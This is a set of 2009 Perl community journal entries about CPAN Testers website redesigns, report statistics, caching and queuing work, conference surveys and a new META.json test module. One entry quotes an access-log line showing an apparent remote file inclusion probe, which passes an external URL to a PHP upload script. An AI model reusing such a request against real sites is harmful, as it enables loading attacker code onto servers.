Stories
Slash Boxes
Comments
NOTE: use Perl; is on undef hiatus. You can read content, but you can't post it. More info will be forthcoming forthcomingly.

All the Perl that's Practical to Extract and Report

use Perl Log In

Log In

[ Create a new account ]

barbie (2653)

barbie
  reversethis-{ku. ... m} {ta} {eibrab}
http://barbie.missbarbell.co.uk/

Leader of Birmingham.pm [pm.org] and a CPAN author [cpan.org]. Co-organised YAPC::Europe in 2006 and the 2009 QA Hackathon, responsible for the YAPC Conference Surveys [yapc-surveys.org] and the QA Hackathon [qa-hackathon.org] websites. Also the current caretaker for the CPAN Testers websites and data stores.

If you really want to find out more, buy me a Guinness ;)

Links:
Memoirs of a Roadie [missbarbell.co.uk]
[pm.org]
CPAN Testers Reports [cpantesters.org]
YAPC Conference Surveys [yapc-surveys.org]
QA Hackathon [qa-hackathon.org]

Journal of barbie (2653)

Wednesday July 15, 2009
01:39 PM

Test::JSON::Meta

A few days ago, Ricardo did a braindump of his current projects. One interested me regarding the META.json to compliment META.yml in CPAN package distributions.

As a consequence I started porting my META.yml test modules to create a META.json one. A few moments ago it got sent to PAUSE, so expect a new distro to my roster to hit a CPAN mirror near you shortly.

Test-JSON-Meta

Monday July 13, 2009
09:42 AM

No PHP here, mate

I'm not sure whether this is amusing or embarrassing:

80.93.48.103 - - [13/Jul/2009:16:30:21 +0200] "GET /show//components/com_simpleboard/file_upload.php?sbp=http://quangpham.info/wp-i ncludes/images/blank.gif?? HTTP/1.1" 404 365 "-" "libwww-perl/5.803" 189 www.cpantesters.org

In case you're wondering, the above is an entry from the access logs on the CPAN Testers server. The script they are trying to access doesn't exist, and from what I can tell it's a poor attempt at crashing a server. The bit that amused me is that they're using LWP to run a PHP app. The bit that's embarrassing is that Perl is being used for undesirable purposes :(

Saturday July 04, 2009
08:45 AM

CPAN Testers Summary - June 2009 - The Nylon Curtain

Cross posted from the CPAN Testers Blog.

June saw a lot of work behind the scenes for CPAN Testers. At the end of the month David and Ricardo finally got to release Metabase to CPAN, the project key to moving towards CPAN Testers 2.0. If you're interested in helping out or finding out more, join the mailing list, or take a look at the current Github repo. David has identified some of the areas still to be worked on, so if you have some tuits to help out, it would be very much appreciated.

The end of June also enjoyed the sun in Pittsburgh as part of YAPC::NA 2009, aka YAPC|10. While there were some testing related talks, there wasn't a specific CPAN Testers talk this year, or BOF. So much has been going into the work of getting the websites upgraded I never got the time to prepare a talk about it all. Next year hopefully we'll have a lot more to say about Metabase and the CPAN Testers 2.0 infrastructure. The talk I did do in Pittsburgh, The Statistics of CPAN, did however highlight some very positive numbers about the state of CPAN. If nothing else it highlights that CPAN Testers has a lot of work to continue with for a long time to come. I'm looking at putting a number of the tables and graphs into the CPAN Testers Statistics website, and if you have any suggestions for more, please let me know.

Following the changes in the CPAN Testers Reports website, the old domains now point to the static pages. Thanks to Ask, Robert and Jos for helping out with that. In doing so, a number of issues were pointed out that caused others problems. Specifically with the YAML files that are produced. Due to the vast number of reports now available, processing them is extremely time consuming. As a consequence to reduce the overhead, I ended up streamlining the data recorded in the YAML and JSON files, as several fields were either repeated or complete redundant. Unfortunately this has meant that some consumers of these files now are not able to process them correctly. As such there is now a new distribution on CPAN, CPAN-Testers-WWW-Reports-Parser, which can be used to correctly parse a CPAN Testers YAML or JSON file or data block, and return the fields you want. It supports all the fields previously used and knows how to construct them all from the current data set. If you plan on using the CPAN Testers data for a future project, please consider using this to ensure any future changes are instantly picked with a simple upgrade.

Last month we had a total of 165 testers submitting reports. The mappings this month included 34 total addresses mapped, of which 17 were for newly identified testers.

Congratulations to Dan Collins, who managed to post over 89,000 test reports in a single month, the highest we've ever had. Unsurprisingly Chris wasn't too far behind :) I was also delighted to meet up with George Greer at YAPC|10, as for those that weren't aware, George took the honour of the 4 millionth post to the CPAN Testers mailing list at the end of May. A few days later, on June 7th, Serguei Trouchelle posted the 4 millionth accepted test report. Hopefully I'll get to meet Serguei at some point too. On average we have previously being seeing just over 200,000 reports posted each month, however, June saw 358,107 reports posted, a staggering amount of effort from all the testers.

The next summary will hopefully be posted during YAPC::Europe 2009 in Lisbon. If you're a tester and will be there too, please come and say hello

Tuesday June 02, 2009
07:37 AM

CPAN Testers Stats - May Summary - Seven Stories Into Eight

Cross posted from the CPAN Testers Blog

Quite a bit of activity has been happening in the last month, as you are no doubt aware if you are already reading this :) It marks a significant leap forward for CPAN Testers, which I hope continues.

First off David Golden managed to successfully input a report into the Metabase, following the full process of testing, reporting, and submitting the report. The Metabase is the centre piece to the whole move to CPAN Testers 2.0, so this is a major step forward. There is still plenty to do, before CT2.0 is fully implemented, but it a great step towards the end goal. Well done to David and Ricardo.

The biggest visual change that happen last month was the facelift given to several of the CPAN Testers websites. The new look had been on the cards to do for quite sometime, but it wasn't a high priority, as functionality changes took most of my time. However, with some enforced CFT, I finally got a round tuit (although sadly not one of those wooden ones I see every so often at conferences :( ). Prompted by a post by Adam Kennedy, I spent some time after doing the biggest functionality to look at ways to improve the look and feel. I found a design that looked suitable, and began to adapt it for the look and feel that was released. Despite some disappointed comments, the majority of feedback as been very favourable.

Part of the functionality changes include with the release of the new designs, was to now have a static site that reflects all the recent fixes to the underlying codebase, but without all the javascript extras available in the dynamic site. A number of people have been asking for a site that would enable them to switch from the old site, including some with issues with accessibility. As the old sites had not been updating since the end of March, the need for the static site grew. After a week bedding the new site in, the old URLs have now been moved to the new sites, so you will at least get redirected now. However, I would like to ask that if you have any reference to the old domains in code or documentation, or can update and wikis or online articles, please change to the new domains. If you don't have access or cannot update any changes, please let me know and I will try and contact the right author. The domains to change are:

On the 30th March 2009, at around 2.15AM, the 4 millionth post to the cpan-testers mailing list was made. While we still have a little way to go for the 4 millionth report, it still marks an impressive milestone in the history of CPAN Testers. With just another 80,000 or so reports to go, we should reach the 4 millionth report sometime this month.

On the CPAN Testers Discussion mailing list, I happened to point out that on every page of the new site design, across all the sites, the footer now includes a reference to the Perl programming language. David Golden has now done the same for the reports from CPAN-Reporter, but he lamented that if only we'd been doing this from the start. Thankfully I have a solution for that, as another site I'm planning on implementing is one to replace the NNTP web interface that is currently used. So that'll be 4 million web pages to add to the engines :)

We topped 144 testers submitting reports last month, so thank you again to everyone involved. The mappings this month included 36 total addresses mapped, of which 22 were for newly identified testers.

Monday May 25, 2009
01:11 PM

Dig The New Breed

Launch Day

After much anticipation, I am delighted to finally announce the launch of all the new designs for the CPAN Testers family of websites. Or at least the ones I look after. This is a major step forward for the websites, as they have long been in need of a facelift to bring them into line with each other. While my design skills are now l33t by any stretch, hopefully they have served me well enough to give the sites a more professional and polished look.

The New Designs

If you haven't seen the sites yet, follow any of the links below. You can then click one of the options from the family navigation bar to see all the others :)

The Static Reports

As mentioned on several occasions now, there is now a static site version of CPAN Testers Reports. However, please bear in mind that some of the pages are huge and will take your browser several minutes to render. The static site is provide as a companion to the dynamic site for those who either wish to not use Javascript, or their method of viewing does not support it. All the same code is used to generate the pages of both sites, so rest assured that any future fixes will be replicated into both sites at the same time.

Once any potential issues are ironed out, I hope to get Jos to switch the DNS for the old testers.cpan.org to point to the new static site. As such, if you currently use the old site and feel there is anything missing from the new site, please let me know as soon as possible.

The CPAN Testers Blog

Another new addition to the CPAN Testers family of websites is the new CPAN Testers Blog. Initially this will just contain the summaries and some of the announcements (as ported from the blog on the old CPAN Testers Statistics site) that have been made over the past couple of years, but in time I hope to encourage others involved with CPAN Testers to contribute news and articles for inclusion.

Feedback

It seems like it's taken forever to these changes done, though in reality it has only been about 2-3 months. It has been an intense working regime, having spent most of my waking, non-employer working hours on the sites, and pretty much full-time during April. I'd personally like to thank Nicole, partly as an art advisor critiquing some of the colour choices, but mostly for putting up with me sitting on the sofa in the evenings for the past few months, while I've been getting all the changes done

As per usual, if there are any problems or (helpful) suggestions you have regarding the new design or a specific site, please let me know.

Now it's time for a rest!

Sunday May 24, 2009
02:43 PM

Cleaning up the Meta

Taking a break from waiting for the CPAN Testers updates (nearly done), I took some time to review some updates to the META.yml test distributions, which have had a couple of outstanding bug reports that should have been applied months ago. My thanks to David Golden and Jonathan Yu for their bug reports and patches.

I've also now added the repos to GitHub, so feel free to follow the repos and send patches if you have any suggestions for improvement.

Thursday May 21, 2009
04:41 PM

Waiting For The Big One

The new family is now sitting waiting patiently, all but the big one are up to speed and ready to say hello to the world. Unfortunately the big one is HUGE and despite ripping through data like a hot knife through butter, still has a large amount to get through.

The old reports site currently holds over 5.2GB of data files, and the new site is likely to be over 10GB. The builder behind the scenes is getting through roughly 200 data points an hour (producing 6 files for every data point). There are over 25,000 data points in total and after a day of processing is now down to 21,000 data points still to go. Understandably the database usage is going through the roof, but amazingly the live site doesn't seem to be suffering.

I'm hoping that over the weekend the builder will get through a large enough chunk of the remaining data points, so that I can finally do the official launch next week. Check back here after the weekend for an update :)

Sunday May 17, 2009
05:01 PM

Dynamic CPAN Testers Reports - Phases Two, Three & Four!

After much talk about the ideas for improving the CPAN Testers Reports, I'm finally please to announce the completion of the work so far. There have been 3 significant changes to the site behind the scenes, all of which will hopefully improve the way everyone interacts with the site.

Phase Two was to finish off a number changes to enable a dynamic site. As it's turned out a full dynamic site hasn't been possible, as some of the pages still take several minutes to retrieve all the records from the database and render the pages. The 'ADAMK test' took over 30 minutes! As such a redesign of the caching was implemented that now means the pages are updated in the background. It means that the most frequently visited pages are more likely to be up to date now.

Phase Three was to implement a flat HTML site, that was similar to the old site, before the Javascript was included, but also benefits from all the fixes that have been implemented into the current site. As a result of the caching changes in Phase Two, this was actually extremely easy to implement, as it only meant adding templates.

With all that done, I was virtually ready to implement the sites on the live server. However, following a post by Adam Kennedy about the state of some of the Perl websites, I decided to hold back and concentrate on Phase Four. This last phase wasn't just planned for the reports sites, but aimed at covering all the CPAN Testers websites I'm responsible for. When I first created the Statistics website, I was more interested in making the the data and information available, and always figured I'd get around to designing a proper layout at some point. With me taking a month out during April, the time was ripe to completely redesign all the sites. So taking an inital design from the OSWD site, I amended it appropriately for my uses, and I have now converted all the CPAN Testers sites I look after across to the new design.

Hopefully the new design will meet with everyone's approval (Leon, fear not there is still an orange colour scheme in there :)), and the changes to the functionality improve the way people are able to use and access the site. For the time being the old path mappings should remain working, but I would advise moving to the new path structure when the sites go live.

So when are you going to get to see all these changes? Well very very soon. I'm currently setting up the new designs on the server and once everything is in place I'll be doing a symlink switch. Please be patient .. just a little while longer ;)

Tuesday May 05, 2009
05:00 PM

CPAN Testers Stats - April Summary - Hau Ruck

CPAN Testers Statistics

So this month has mostly featured a lot of work after the QA Hackathon, without too many announcements. While there has been a lot of changes behind the scenes, we've mostly been getting on with stuff. David Golden and Ricardo Signes have been continuing with the Metabase, to the point David can now submit reports locally. There is still a bit of work needed to get the rest of the pieces all synced and working, but we are getting closer to CT2.0.

The mailers managed to highlight a fault recently, that has now been fixed, so if you've been wondering why the Summaries haven't been appearing, they should start filtering through again soon. As announced during April, there are now Weekly and Monthly Summary reports available, as well as the ability to receive individual mails again. Check the appropriate pages on the CPAN Testers Preferences website and update as you require.

As mentioned in my blog last week, my time over the last month has featured work on the dual dynamic and static sites for the Reports. I'm pleased to say the underlying code is now complete. It will take a little while to carefully change the live system, as there are some significant database changes required, so I want to make sure the changes don't have any adverse affects. In addition, prompted by Adam Kennedy's blog post about the state of many Perl websites, I took some to look at some designs and found one that looked perfect for the job. I've now reskinned several of the CPAN Testers sites and just have 1 publicly visible site left to do. There is another that has been waiting in the wings for some time, but I may wait until CT2.0 is available before unleashing it. However, with all the changes going on, there is one site that will be new (sort of), although it really is just a fork one of the existing sites. Seeing as I don't want to spoil the surprises, you're just going to have to wait for a little while longer to see all the results :)

We passed 3.5 million test reports last month, and although there were quite a number of reports posted last month, considering that last month CPAN had the most distributions submitted in a month ever (1897), it wasn't quite as many as I would have expected. Unfortunately the graphs on CPAN Testers Statistics have reached their Google Chart limit, so I'll be altering the graphs slightly for next month.

We topped 149 testers submitting reports last month, so thank you again to everyone involved. The mappings this month included 24 total addresses mapped, of which 10 were for newly identified testers.

Friday May 01, 2009
09:15 AM

What Happened to April?

For those that might not be aware, I got made redundant on 31st March (the day after the QA Hackathon had finished). Thankfully, I start a new job next week, so I've managed to land on my feet. However, this has meant that I've ended up having the whole of April off to do stuff. My plan was to work on some of the Open Source projects that I'm involved with to move them further along to where I wanted them to be. As it turned out two specific projects got my attention over the last 4 weeks, and I thought it worth giving a summary of what has been going on.

YAPC Conference Surveys

Since 2006, I've been running the conference surveys for YAPC::Europe. The results have been quite interesting and hopefully have help organisers improve the conferences each year. For 2009 I had already planned to run the survey for YAPC::Europe in Lisbon, but this year will also see YAPC::NA in Pittsburgh having a survey of their own.

The survey site for Copenhagen in 2008 added the ability to give feedback to Master Classes and talks. The Master Classes feedback was a little more involved, as I was able to get the attendee list, but the talks feedback was quite brief. As such, I wanted to try and expand on this aspect and generally improve the process of running the surveys. Part of this involved contacting Eric and BooK to see if ACT had an API I could use to automate some of the information. I was delighted to get an email back from Eric, who very quickly incorporated an API that I could use, to retrieve the necessary data to keep the survey site for a particular conference up to date, even during the conference.

With the API and updates done, it was time to focus on expanding the surveys and skinning the websites to match that of the now live conference sites. The latter was relatively easy, and only required a few minor edits to the CSS to get them to work with the survey site. The survey site now has 3 types of survey available, though only 2 are visible to anyone not taking a Master Class. Those that have taken one of the YAPC::Europe surveys will be aware I don't use logins, but a key code to access the survey. This has been extended so that it can now be used to access your portion of the survey website. This can now be automatically emailed to attendees before the conference, and during if they pay on the door, and will allow everyone to feedback on talks during the conference. On the last day of the conference the main survey will be put live, so you can then answer questions relating to your conference experience.

I'm hoping the slight change won't be too confusing, and that we'll see some ever greater returns for the main survey. Once it does go live, I'd be delighted to receive feedback on the survey site, so I can improve it for the future.

CPAN Testers Reports

Since taking over the CPAN Testers Reports site in June 2008, I have spent a great deal of time improving it's usability for users. However, it's come at a price. By using more and more Javascript to dynamically change the contents of the core pages, it's meant that I have received a number of complaints that the site doesn't work for those with Javascript disabled or who use a browser that doesn't implement Javascript. For this reason I had decided that I should create a dynamic site and static site. The problem with this is that the current system to create all the files takes several hours for each set of updates (currently about 16 hours per day). I needed a way to drive the site without worrying about how long everything was taking, but also add some form of prioritisation so that the more frequently requested pages would get updated more quickly than those rarely seen.

During April, JJ and I went along to the Milton Keynes Perl Mongers technical meeting. One of the talks was about memcached and it got me thinking as to whether I could use it for the Reports site. Discussing this with JJ on the way home, we threw a few ideas around and settled on a queuing system to decide what needed updating, and to better managed the current databases to add indexes to speed up some of the complex lookups. I was still planning to use caching, but as it turned out memcached wasn't really the right way forward.

The problem with caching is that when there is too much stuff in the cache, the older stuff gets dumped. But what if the oldest item to get dumped is extremely costly on the database, and although it might not get hit very often, it's frequent enough to be worth keeping in the cache permanently. It's possible this could be engineered with memcached if this was for a handful of pages, but for the Reports site it's true for quite a few pages. So I hit on a slightly different concept of caching. As the backend builder process is creating all these static files, part of the process involves grabbing the necessary data to display the basic page, with the reports then being read in via the now static Javascript file for that page. Before dropping all the information and going on to the next in the list, the backend can simply write the data to the database. The dynamic site can then simply grab that data and display the page pretty quickly, saving ALOT of database lookups. Add to the fact that the database tables have been made more accessible to each other, the connection overhead has also been reduced considerably.

The queuing system I've implemented is extremely simple. On grabbing the data from the cache, the dynamic site checks quickly to see if there is a more recent report in existence. If there is, then a entry is added to the queue, with a high weighting to indicate that a website user is actually interested in that data. Behind the scenes the regular update system simply adds an entry in the queue to indicate that a new entry is available, but at a low weighting. The backend builder process then looks to build the entries with the most and highest weightings and builds all the static files, both for the dynamic site and the static site, including all the RSS, YAML and JSON files. It seems to work well on the test system, but the live site will be where it really gets put through its paces.

So you could be forgiven in thinking that's it, the new site is ready to go. Well not quite. Another part of the plan had always been to redesign the website. Leon had designed the site based on the YUI layouts, and while it works for the most part, there are some pages which don't fit well in that style. It also has been pretty much the same kind of style since it was first launched, and I had been feeling for a while that it needed a lick of paint. Following Adam's blog post recently about the state of Perl websites, I decided that following the functional changes, the site would get a redesign. It's not perhaps as revolutionary as some would want, judging from some of the ideas for skins I've seen, but then the site just needs to look professional, not state of the art. I think I've managed that.

The work to fit all the pieces together and ensure all the templates are correct is still ongoing, but I'm hopeful that at some point during May, I'll be able to launch the new look websites on the world.

So that's what I've been up to. I had hoped to work on Maisha, my other CPAN distributions, the YAPC Conference Survey data, the videos from the QA Hackathon among several other things, but alas I've not been able to stop time. These two projects perhaps have the highest importance to the Perl community, so I'm glad I've been able to get on with them and get done what I have. It's unlikely I'll have this kind of time again to concentrate solely on Open Source/Perl for several years, which in some respects is a shame, as it would be so nice to be paid to do this as a day job :) So for now, sit tight, it's coming soon...